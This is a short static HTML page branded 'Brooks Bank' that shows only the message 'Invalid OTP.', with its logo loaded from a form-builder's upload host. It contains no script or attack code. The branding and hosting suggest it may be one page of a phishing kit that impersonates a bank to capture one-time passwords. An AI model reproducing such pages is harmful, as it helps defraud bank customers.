
<html>
	<head>
		<style>
			html, body {
				margin: 0; padding: 0;
				background: #fff;
				color: #333;
				font: 12px/15px Verdana, sans-serif;
			}
			#container {
				max-width: 520px;
				margin: 30px;
				padding: 0px;
				
			}
			#content h2 {
				font: bold 16px/16px Verdana, sans-serif;
				margin: 0;
				padding: 0;
				margin-bottom: 12px;
			}
			#header {
				
				height: 40px;
				padding-bottom: 0;
				color: #e47911;
				position:relative;
				margin-bottom: 12px;
			}
			#header h1 {
				font-size: 12px;
				line-height: 12px;
				margin: 0; padding: 0;
				position: absolute;
				bottom: 0;
				right: 0;
			}
			#content {
				padding: 12px;
				background: #ecf5fb;
				border: 1px solid #c9e1f4;
				-moz-border-radius: 10px;
				-webkit-border-radius: 10px;
				border-radius: 10px;
				margin-top: 30px;
			}
			p {
				margin-top: 0;
				margin-bottom: 12px;
			}
			.error {
				color: #900;	
			}
			.success {
				color: #090;
			}
			code {
				font-style: normal;
				color: #000;
			}
			abbr {
				font-weight: bold;
			}
			a:visited, a:hover {
				color: #004b91;
			}
		</style>
	</head>
	<body>
		<div id="container">
			<div id="header">
				<img src="https://www.jotform.com/uploads/bronnv8/form_files/BrooksBank.6372244b737fe2.29841539.png" alt="BB" width="70" height="70">
				<h1>Brooks Bank</h1>
			</div>
		<div id="content">
			<h2 id="status">Invalid OTP.</br></h2>
		</div>
		</div>
	</body>
</html>
